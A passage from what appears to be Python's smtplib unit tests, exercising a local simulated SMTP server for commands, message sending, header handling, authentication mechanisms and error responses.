n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
@unittest.skipUnless(threading, 'Threading required for this test.')
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testSourceAddress(self):
# connect
port = support.find_unused_port()
try:
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3, source_address=('127.0.0.1', port))
self.assertEqual(smtp.source_address, ('127.0.0.1', port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testEHLO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
# test response of client to a non-successful HELO message
@unittest.skipUnless(threading, 'Threading required for this test.')
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
@unittest.skipUnless(threading, 'Threading required for this test.')
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = support.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
thread = threading.Thread(target=server, args=servargs)
thread.start()
self.addCleanup(thread.join)
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
'authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
pass
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'CRAM-MD5', 'PLAIN', 'LOGIN'}
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=15)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rset_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
